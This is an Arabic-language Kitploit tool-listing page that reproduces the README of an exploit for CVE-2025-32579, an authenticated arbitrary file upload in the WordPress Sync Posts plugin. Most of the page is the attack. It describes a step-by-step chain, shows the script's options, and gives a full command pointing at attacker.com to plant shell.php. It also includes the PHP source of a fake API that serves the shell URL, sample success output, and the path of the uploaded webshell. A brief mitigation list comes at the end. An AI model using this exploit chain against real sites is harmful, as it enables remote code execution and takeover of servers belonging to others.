Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32579 — WordPress Sync Posts Plugin <= 1.0 عرضة للرفع التعسفي للملفات | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-32579
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2025-32579

CVE-2025-32579

WordPress Sync Posts Plugin <= 1.0 عرضة للرفع التعسفي للملفات

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

⚠️ CVE-2025-32579 - ثغرة RCE حرجة عبر إضافة Sync Posts (ووردبريس)

📦 يؤثر على: Sync Posts <= 1.0
🧨 درجة CVSS: 9.9 حرجة
📁 متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H


🧠 نظرة عامة على الثغرة

إضافة Sync Posts لووردبريس من إنتاج SoftClever Limited معرّضة لثغرة رفع ملفات غير مقيد تسمح لـالمهاجمين المُصادَق عليهم برفع ملفات PHP عشوائية (مثل شِل الويب) وتنفيذها على الخادم.

🔓 السبب الجذري:

  • تقبل الإضافة website_url الذي يعيد منشورات JSON.
  • تقوم بجلب الصور بشكل أعمى من محتوى المنشورات دون أي تحقق.
  • لا يتم تطبيق أي قيد على نوع الملف أو MIME أو المسار.
  • يتم تنزيل جميع الصور (حتى ملفات PHP) وتخزينها داخل wp-content/uploads.

🚨 لماذا تُعد خطيرة

  • ✅ تنفيذ تعليمات برمجية عن بُعد (RCE)
  • ✅ رفع شِل الويب مباشرة إلى الخادم
  • ✅ تتطلب حدًا أدنى من الصلاحيات (مستخدم مُصادَق فقط)

⚙️ وصف السكربت (الاستغلال)

يقوم سكربت الاستغلال بأتمتة السلسلة الكاملة:

  1. 📥 تسجيل الدخول إلى ووردبريس باستخدام بيانات الاعتماد المقدمة
  2. 🧠 إنشاء PHP لـ API وهمي يعيد منشور JSON يحتوي على شِل داخل <img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/...">
  3. 📡 إرسال website_url خبيث إلى admin-ajax.php?action=sync_posts
  4. 💣 إجبار الإضافة على جلب الشِل وحفظه في /uploads/
  5. ✅ لا حاجة لـ Referer أو nonce — تكفي كوكي الجلسة

root@kitploit:~
usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL

Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://target.com/wordpress)
  -un, --username USERNAME
                        Username to login
  -p, --password PASSWORD
                        Password to login
  -ws, --website WEBSITE
                        URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
  -shell, --webshell WEBSHELL
                        Web shell URL used inside the fake API (can be a test image)
                                                                                       

💻 تعليمات الاستخدام

📌 صيغة الأمر:

root@kitploit:~
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php

⚙️ الوسائط:

الخيارالوصف
-u, --urlعنوان URL المستهدف لووردبريس
-un, --usernameاسم مستخدم ووردبريس (admin)
-p, --passwordكلمة مرور ووردبريس
-ws, --websiteرابط ملف PHP الخبيث الذي يعيد JSON لمنشور وهمي
-shell, --webshellملف الشِل الفعلي الذي سيتم حقنه عبر ``

يمكنك أيضًا استخدام صورة وهمية بدلًا من شِل حقيقي للاختبار:

root@kitploit:~
--webshell https://via.placeholder.com/1x1.jpg

🧪 مثال على استجابة الـ API الوهمي

هذه هي الاستجابة التي يعيدها Khaled_alenazi.php:

root@kitploit:~
<?php
header('Content-Type: application/json');
echo json_encode([
  [
    "id" => 1,
    "title" => ["rendered" => "Nxploited"],
    "content" => [
      "rendered" => "<img src="http://attacker.com/shell.php">"
    ]
  ]
]);
?>

✅ استغلال ناجح:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
  "success": true,
  "data": {
    "message": "Posts imported successfully",
    ...
  }
}

🔥 بعد الاستغلال الناجح:

  • مسار واسم الشِل: shell.php
  • target.com/wp-content/uploads/2025/04/shell.php

🛠️ الإصلاح / التخفيف

  • قيّد وصول website_url إلى نطاقات داخلية أو مضيفات مدرجة في القائمة البيضاء
  • تحقق من امتدادات الصور وأنواع المحتوى
  • تجنّب تحليل JSON من أطراف ثالثة دون تعقيم

🧷 المرجع

CVE: CVE-2025-32579
الاستغلال بواسطة Nxploited (Khaled Alenazi)


تنزيل الأداة